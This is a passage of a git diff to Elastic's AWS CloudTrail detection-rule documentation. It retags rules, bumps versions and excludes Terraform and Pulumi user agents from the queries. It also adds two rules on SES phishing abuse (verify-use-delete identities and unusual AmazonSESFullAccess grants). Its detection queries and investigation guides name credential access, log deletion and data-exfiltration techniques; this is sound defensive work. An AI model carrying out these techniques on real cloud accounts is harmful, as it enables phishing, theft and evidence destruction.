Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS RDS -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS RDS * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 212 +*Version*: 213 *Rule authors*: @@ -171,6 +171,7 @@ data_stream.dataset: aws.cloudtrail and event.provider: rds.amazonaws.com and event.action: (DeleteDBCluster or DeleteGlobalCluster or DeleteDBInstance) and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc index 7b1009f426..0a3643534c 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-instance-or-cluster-deletion-protection-disabled.asciidoc @@ -28,14 +28,14 @@ Identifies the modification of an AWS RDS DB instance or cluster to disable the *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS RDS -* Resources: Investigation Guide -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS RDS * Tactic: Impact +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -140,6 +140,7 @@ any where data_stream.dataset == "aws.cloudtrail" and event.action in ("ModifyDBInstance", "ModifyDBCluster") and event.outcome == "success" and stringContains(aws.cloudtrail.request_parameters, "deletionProtection=false") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-snapshot-created.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-snapshot-created.asciidoc index 38d0e8227e..d511528969 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-rds-db-snapshot-created.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-rds-db-snapshot-created.asciidoc @@ -25,14 +25,13 @@ Identifies when an AWS RDS DB Snapshot is created. This can be used to evade def *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS RDS -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS RDS * Tactic: Defense Evasion * Rule Type: BBR -*Version*: 3 +*Version*: 4 *Rule authors*: @@ -48,6 +47,7 @@ Identifies when an AWS RDS DB Snapshot is created. This can be used to evade def ---------------------------------- event.dataset: "aws.cloudtrail" and event.provider: "rds.amazonaws.com" and event.action: ("CreateDBSnapshot" or "CreateDBClusterSnapshot") and event.outcome: "success" + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc index 606ff9a4ad..9e6da19a39 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-route-53-private-hosted-zone-associated-with-a-vpc.asciidoc @@ -27,15 +27,15 @@ Identifies when an AWS Route 53 private hosted zone is associated with a new Vir *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Route 53 -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS Route 53 * Tactic: Persistence * Tactic: Resource Development +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 213 +*Version*: 214 *Rule authors*: @@ -144,6 +144,7 @@ data_stream.dataset: aws.cloudtrail and event.provider: route53.amazonaws.com and event.action: AssociateVPCWithHostedZone and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc index 4db4f90f02..7fb397ce5b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-configuration-deletion.asciidoc @@ -31,15 +31,15 @@ Identifies the deletion of critical Amazon S3 bucket configurations such as buck *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: Amazon S3 -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 * Tactic: Defense Evasion * Tactic: Impact +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 214 +*Version*: 215 *Rule authors*: @@ -132,6 +132,7 @@ data_stream.dataset:aws.cloudtrail and DeleteBucketEncryption or DeleteBucketLifecycle) and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc index fbd2d5949d..e41faface4 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-expiration-lifecycle-configuration-added.asciidoc @@ -27,14 +27,14 @@ Identifies the addition of an expiration lifecycle configuration to an Amazon S3 *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: Amazon S3 -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 * Tactic: Defense Evasion +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -153,6 +153,7 @@ info where data_stream.dataset == "aws.cloudtrail" and event.action == "PutBucketLifecycle" and event.outcome == "success" and stringContains(aws.cloudtrail.request_parameters, "Expiration=") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc index 3d9223fd81..a87dc11400 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-policy-added-to-share-with-external-account.asciidoc @@ -28,15 +28,15 @@ Detects when an Amazon S3 bucket policy is modified to share access with an exte *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS S3 -* Use Case: Threat Detection -* Tactic: Exfiltration +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 * Tactic: Collection +* Tactic: Exfiltration +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 10 +*Version*: 11 *Rule authors*: @@ -161,6 +161,7 @@ info where data_stream.dataset == "aws.cloudtrail" and not stringContains(aws.cloudtrail.request_parameters, "arn:aws:cloudfront::") and not stringContains(aws.cloudtrail.request_parameters, "arn:aws:iam::cloudfront:user") and not stringContains(aws.cloudtrail.request_parameters, aws.cloudtrail.recipient_account_id) + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-replicated-to-another-account.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-replicated-to-another-account.asciidoc index 2e6843a052..c2c02adede 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-replicated-to-another-account.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-replicated-to-another-account.asciidoc @@ -28,14 +28,14 @@ Identifies the creation or modification of an S3 bucket replication configuratio *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS S3 -* Resources: Investigation Guide -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 * Tactic: Exfiltration +* Rule Type: Event Correlation (EQL) +* Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -161,6 +161,7 @@ info where data_stream.dataset == "aws.cloudtrail" and event.action == "PutBucketReplication" and event.outcome == "success" and stringContains(aws.cloudtrail.request_parameters, "Account=") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-server-access-logging-disabled.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-server-access-logging-disabled.asciidoc index afce7d86b6..49b6af2813 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-server-access-logging-disabled.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-bucket-server-access-logging-disabled.asciidoc @@ -28,14 +28,14 @@ Identifies when server access logging is disabled for an Amazon S3 bucket. Serve *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: Amazon S3 -* Use Case: Asset Visibility +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 * Tactic: Defense Evasion +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -128,6 +128,7 @@ info where data_stream.dataset == "aws.cloudtrail" and event.action == "PutBucketLogging" and event.outcome == "success" and not stringContains(aws.cloudtrail.request_parameters, "LoggingEnabled") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-s3-object-versioning-suspended.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-s3-object-versioning-suspended.asciidoc index aa69e16eb9..f0918adc12 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-s3-object-versioning-suspended.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-s3-object-versioning-suspended.asciidoc @@ -31,14 +31,14 @@ Identifies when object versioning is suspended for an Amazon S3 bucket. Object v *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS S3 -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS S3 * Tactic: Impact +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 8 +*Version*: 9 *Rule authors*: @@ -140,6 +140,7 @@ info where data_stream.dataset == "aws.cloudtrail" and event.action == "PutBucketVersioning" and event.outcome == "success" and stringContains(aws.cloudtrail.request_parameters, "Status=Suspended") + and not user_agent.original like~ ("*Terraform*", "*Pulumi*") ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ses-email-identity-verified-then-deleted.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ses-email-identity-verified-then-deleted.asciidoc new file mode 100644 index 0000000000..ed5c7417c9 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-ses-email-identity-verified-then-deleted.asciidoc @@ -0,0 +1,137 @@ +[[aws-ses-email-identity-verified-then-deleted]] +=== AWS SES Email Identity Verified Then Deleted + +Detects an SES email identity being verified and subsequently deleted within a 30-minute window, performed by the same AWS identity. Amazon SES requires email addresses and domains to be verified before they can be used as senders. An adversary who obtains SES credentials may verify a domain or address they control, use it to send phishing or spam email, then delete the identity to remove evidence of the sending domain from the account's verified identity list. This verify-use-delete pattern is a recognized attacker technique for SES abuse. + +*Rule type*: esql + +*Rule indices*: None + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 30m + +*Searches indices from*: now-60m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/ses/latest/APIReference/API_VerifyEmailIdentity.html +* https://docs.aws.amazon.com/ses/latest/APIReference/API_DeleteIdentity.html +* https://permiso.io/blog/s/aws-ses-pionage-detecting-ses-abuse/ + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SES +* Rule Type: ESQL +* Tactic: Resource Development +* Tactic: Defense Evasion +* Resources: Investigation Guide + +*Version*: 2 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS SES Email Identity Verified Then Deleted* + + +Amazon SES requires that email addresses and domains be verified (via DNS record or a verification email) before they can be used as `From:` addresses. An adversary who obtains SES write credentials can verify a domain they control, send bulk email from that domain using the victim account's sending quota and reputation, then delete the identity to hide the sending domain from security reviews. + +The verify-then-delete sequence is the evidence-destruction component of the SES phishing technique: it removes the compromised identity from `ListIdentities` output, making post-incident attribution harder. + +This is an ES|QL rule that aggregates SES verification and deletion events per calling identity within 30-minute windows and alerts when the same identity performed both, with the verification preceding the deletion. + + +*Possible investigation steps* + + +- Identify the caller from `aws.cloudtrail.user_identity.arn` and the aggregated `user_names` column. +- Pivot to the raw CloudTrail events for this ARN in the `first_verify` to `last_delete` time range to determine the verified identity from the `VerifyEmailIdentity` or `VerifyDomainIdentity` request parameters and the deleted identity from the `DeleteIdentity` request parameters. +- Query SES `SendEmail` / `SendRawEmail` CloudTrail events (if CloudTrail management events are being collected) or SES sending statistics between the verification and deletion timestamps to determine whether email was sent from the verified identity. +- Check your email service provider's delivery logs for any email sourced from the SES identity. +- Review all SES actions taken by this identity in the surrounding time window. + + +*Response and remediation* + + +- If unauthorized email was sent, notify affected recipients and file an SES abuse report. +- Rotate all IAM credentials that had SES write access during the incident window. +- Enable SES sending quotas and alerts to detect unusual send volume in real time. +- Restrict `ses:VerifyEmailIdentity`, `ses:VerifyDomainIdentity`, and `ses:DeleteIdentity` to a dedicated SES-management role via IAM policy. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. SES management APIs are logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +from logs-aws.cloudtrail-* metadata _id, _version, _index +| where data_stream.dataset == "aws.cloudtrail" + and event.provider == "ses.amazonaws.com" + and event.action in ("VerifyEmailIdentity", "VerifyDomainIdentity", "VerifyEmailAddress", "VerifyDomainDkim", "DeleteIdentity") + and event.outcome == "success" + and aws.cloudtrail.user_identity.arn is not null +| eval Esql.ses_verify_flag = case(event.action != "DeleteIdentity", 1, 0), + Esql.ses_delete_flag = case(event.action == "DeleteIdentity", 1, 0) +| stats Esql.ses_verify_count = sum(Esql.ses_verify_flag), + Esql.ses_delete_count = sum(Esql.ses_delete_flag), + Esql.ses_verify_timestamp_min = min(case(Esql.ses_verify_flag == 1, @timestamp)), + Esql.ses_delete_timestamp_max = max(case(Esql.ses_delete_flag == 1, @timestamp)), + Esql.event_action_values = values(event.action), + Esql_priv.user_name_values = values(user.name), + Esql.cloud_account_id_values = values(cloud.account.id) + by aws.cloudtrail.user_identity.arn +| where Esql.ses_verify_count > 0 and Esql.ses_delete_count > 0 + and Esql.ses_verify_timestamp_min < Esql.ses_delete_timestamp_max + and date_diff("minutes", Esql.ses_verify_timestamp_min, Esql.ses_delete_timestamp_max) <= 30 +| keep aws.cloudtrail.user_identity.arn, Esql.ses_verify_count, Esql.ses_delete_count, Esql.ses_verify_timestamp_min, Esql.ses_delete_timestamp_max, Esql.event_action_values, Esql_priv.user_name_values, Esql.cloud_account_id_values + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Acquire Infrastructure +** ID: T1583 +** Reference URL: https://attack.mitre.org/techniques/T1583/ +* Sub-technique: +** Name: Domains +** ID: T1583.001 +** Reference URL: https://attack.mitre.org/techniques/T1583/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Indicator Removal +** ID: T1070 +** Reference URL: https://attack.mitre.org/techniques/T1070/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc new file mode 100644 index 0000000000..c528f1df74 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user.asciidoc @@ -0,0 +1,130 @@ +[[aws-ses-full-access-policy-attached-to-iam-entity-by-unusual-user]] +=== AWS SES Full Access Policy Attached to IAM Entity by Unusual User + +Detects the first occurrence in 7 days of an AWS identity attaching the managed policy AmazonSESFullAccess to an IAM user, role, or group. AmazonSESFullAccess grants unrestricted permission to send email, manage identities and templates, manage suppression lists, and access SES account-level settings. Granting this policy to an unexpected IAM entity, particularly a newly created user or a role not previously associated with email operations, is a documented technique used by threat actors to establish phishing infrastructure on compromised AWS accounts, enabling them to send email on behalf of the victim organization's trusted sending domain. Using new terms on the calling identity suppresses recurring attachments by known email automation while surfacing identities performing this action for the first time. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-aws.cloudtrail-* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-6m ({ref}/common-options.html#date-math[Date Math format], see also <>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.aws.amazon.com/ses/latest/dg/control-user-access.html + +*Tags*: + +* Domain: Cloud +* Platform: AWS +* Data Source: AWS +* Data Source: Amazon Web Services +* Service: AWS IAM +* Service: AWS SES +* Rule Type: New Terms +* Tactic: Persistence +* Tactic: Resource Development +* Resources: Investigation Guide + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + + +*Triage and analysis* + + + +*Investigating AWS SES Full Access Policy Attached to IAM Entity by Unusual User* + + +AWS Simple Email Service (SES) is a cost-effective bulk email platform with a reputation built on a customer's verified sending domains. Threat actors who compromise an AWS account often establish phishing infrastructure by granting SES access to a new or existing IAM identity and then using that identity's credentials to send phishing emails under the victim organization's trusted domain. Attaching the managed policy `AmazonSESFullAccess` is the simplest way to grant the full range of SES capabilities (send, manage identities, manage suppression lists, configure sending settings). + +This is a new terms rule that alerts only when the calling identity (`aws.cloudtrail.user_identity.arn`) has not attached this policy within the previous 7 days, prioritizing anomalous or first-time activity over recurring automation. + + +*Possible investigation steps* + + +- Identify the caller in `aws.cloudtrail.user_identity.arn` and `user.name`. Determine whether the caller is a legitimate administrator or an anomalous identity. +- Identify the target IAM entity in `user.target.name` and `aws.cloudtrail.flattened.request_parameters.userName` (or `groupName` or `roleName`). Is this a known email automation account, or an entity created recently? +- Query CloudTrail for all SES API calls (`event.provider: ses.amazonaws.com`) from the target entity in the time window after this attachment. Look for `SendEmail`, `SendRawEmail`, `VerifyEmailIdentity`, `SetIdentityMailFromDomain`, or `UpdateAccountSendingEnabled`. +- Review whether the attachment corresponds to a legitimate change management process. Check for a corresponding IAM change window ticket. +- Verify whether SES sending is enabled for the account (`ses:GetAccountSendingEnabled`) and whether there are existing or recently created SES identities. + + +*False positive analysis* + + +- Legitimate email automation services (transactional email, notification services) may attach AmazonSESFullAccess. Confirm the target entity is a known service role. +- CI/CD pipelines that manage email notification infrastructure may attach this policy. Validate via pipeline execution logs and source IP. + + +*Response and remediation* + + +- If unauthorized, immediately detach AmazonSESFullAccess from the target entity and review all SES calls made under that identity. +- Review SES account sending status and disable sending if any unauthorized email was sent. +- Check SES suppression list for any unauthorized modifications (attackers may add or remove entries to influence deliverability). +- Rotate all credentials associated with both the calling identity and the target entity. +- Enable SES event publishing to review any emails sent during the unauthorized period. + + +==== Setup + + +The AWS integration must be ingesting management events into `logs-aws.cloudtrail-*`. No additional data event selectors are required — `iam:AttachUserPolicy`, `iam:AttachRolePolicy`, and `iam:AttachGroupPolicy` are management-plane APIs logged by default. + +==== Rule query + + +[source, js] +---------------------------------- +data_stream.dataset: "aws.cloudtrail" + and event.provider: "iam.amazonaws.com" + and event.action: ("AttachUserPolicy" or "AttachRolePolicy" or "AttachGroupPolicy") + and event.outcome: "success" + and aws.cloudtrail.flattened.request_parameters.policyArn: "arn:aws:iam::aws:policy/AmazonSESFullAccess" + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Sub-technique: +** Name: Additional Cloud Roles +** ID: T1098.003 +** Reference URL: https://attack.mitre.org/techniques/T1098/003/ +* Tactic: +** Name: Resource Development +** ID: TA0042 +** Reference URL: https://attack.mitre.org/tactics/TA0042/ +* Technique: +** Name: Stage Capabilities +** ID: T1608 +** Reference URL: https://attack.mitre.org/techniques/T1608/ diff --git a/docs/detections/prebuilt-rules/rule-details/aws-sns-rare-protocol-subscription-by-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-sns-rare-protocol-subscription-by-user.asciidoc index 68f4629aa6..fe089d76b6 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-sns-rare-protocol-subscription-by-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-sns-rare-protocol-subscription-by-user.asciidoc @@ -29,16 +29,16 @@ Identifies when a user subscribes to an SNS topic using a new protocol type (ie. *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS SNS -* Resources: Investigation Guide -* Use Case: Threat Detection -* Tactic: Exfiltration +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SNS * Tactic: Collection +* Tactic: Exfiltration * Tactic: Impact +* Rule Type: New Terms +* Resources: Investigation Guide -*Version*: 10 +*Version*: 11 *Rule authors*: @@ -109,6 +109,7 @@ data_stream.dataset: "aws.cloudtrail" and event.provider: "sns.amazonaws.com" and event.action: "Subscribe" and event.outcome: "success" + and not user_agent.original: (*Terraform*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc index 9753649726..df5baf51d2 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-ssm-inventory-reconnaissance-by-rare-user.asciidoc @@ -29,14 +29,14 @@ Detects the rare occurrence of a user or role accessing AWS Systems Manager (SSM *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS SSM -* Use Case: Threat Detection +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SSM * Tactic: Discovery +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc index ec3fba3023..30bb3cf090 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-sts-getcalleridentity-api-called-for-the-first-time.asciidoc @@ -29,14 +29,14 @@ An adversary with access to a set of compromised credentials may attempt to veri *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS STS -* Use Case: Identity and Access Audit +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS STS * Tactic: Discovery +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -116,6 +116,7 @@ data_stream.dataset: "aws.cloudtrail" and event.action: "GetCallerIdentity" and event.outcome: "success" and not aws.cloudtrail.user_identity.type: "AssumedRole" + and not user_agent.original: (*Terraform* or *terraform* or *Pulumi* or *eksctl*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-suspicious-user-agent-fingerprint.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-suspicious-user-agent-fingerprint.asciidoc index 67a3b3afd0..0fd80715ba 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-suspicious-user-agent-fingerprint.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-suspicious-user-agent-fingerprint.asciidoc @@ -29,14 +29,13 @@ Identifies successful AWS API calls where the CloudTrail user agent indicates of *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services +* Platform: AWS * Data Source: AWS CloudTrail * Tactic: Initial Access -* Use Case: Cloud Threat Detection +* Rule Type: Event Correlation (EQL) * Resources: Investigation Guide -*Version*: 6 +*Version*: 7 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc index c9050c9d44..c0fbecb619 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-systems-manager-securestring-parameter-request-with-decryption-flag.asciidoc @@ -28,13 +28,14 @@ Detects the first occurrence of a user identity accessing AWS Systems Manager (S *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS Systems Manager +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS SSM * Tactic: Credential Access +* Rule Type: New Terms * Resources: Investigation Guide -*Version*: 9 +*Version*: 10 *Rule authors*: @@ -113,6 +114,10 @@ data_stream.dataset: aws.cloudtrail "cloudformation.amazonaws.com" or "servicecatalog.amazonaws.com" ) + and not user_agent.original: ( + *Fargate* or + *Terraform* + ) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc index 4df7934242..d0adeda61b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-vpc-flow-logs-deletion.asciidoc @@ -28,14 +28,14 @@ Identifies the deletion of one or more flow logs in AWS Elastic Compute Cloud (E *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS EC2 -* Use Case: Log Auditing -* Resources: Investigation Guide +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS EC2 * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) +* Resources: Investigation Guide -*Version*: 213 +*Version*: 214 *Rule authors*: @@ -112,6 +112,7 @@ The AWS Fleet integration, Filebeat module, or similarly structured data is requ [source, js] ---------------------------------- data_stream.dataset:aws.cloudtrail and event.provider:ec2.amazonaws.com and event.action:DeleteFlowLogs and event.outcome:success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc index 9193d6c460..1a7fa690bf 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-waf-access-control-list-deletion.asciidoc @@ -28,14 +28,14 @@ Identifies the deletion of an AWS Web Application Firewall (WAF) Web ACL. Web AC *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS WAF -* Use Case: Network Security Monitoring +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS WAF * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 212 +*Version*: 213 *Rule authors*: @@ -173,6 +173,7 @@ data_stream.dataset: aws.cloudtrail and event.provider: (waf.amazonaws.com or waf-regional.amazonaws.com or wafv2.amazonaws.com) and event.action: DeleteWebACL and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc b/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc index 6bb879683f..206a57d96b 100644 --- a/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/aws-waf-rule-or-rule-group-deletion.asciidoc @@ -28,14 +28,14 @@ Identifies the deletion of an AWS Web Application Firewall (WAF) rule or rule gr *Tags*: * Domain: Cloud -* Data Source: AWS -* Data Source: Amazon Web Services -* Data Source: AWS WAF -* Use Case: Network Security Monitoring +* Platform: AWS +* Data Source: AWS CloudTrail +* Service: AWS WAF * Tactic: Defense Evasion +* Rule Type: Custom Query (KQL) * Resources: Investigation Guide -*Version*: 212 +*Version*: 213 *Rule authors*: @@ -153,6 +153,7 @@ data_stream.dataset: aws.cloudtrail and event.provider: (waf.amazonaws.com or waf-regional.amazonaws.com or wafv2.amazonaws.com) and event.action: (DeleteRule or DeleteRuleGroup) and event.outcome: success + and not user_agent.original: (*Terraform* or *Pulumi*) ---------------------------------- diff --git 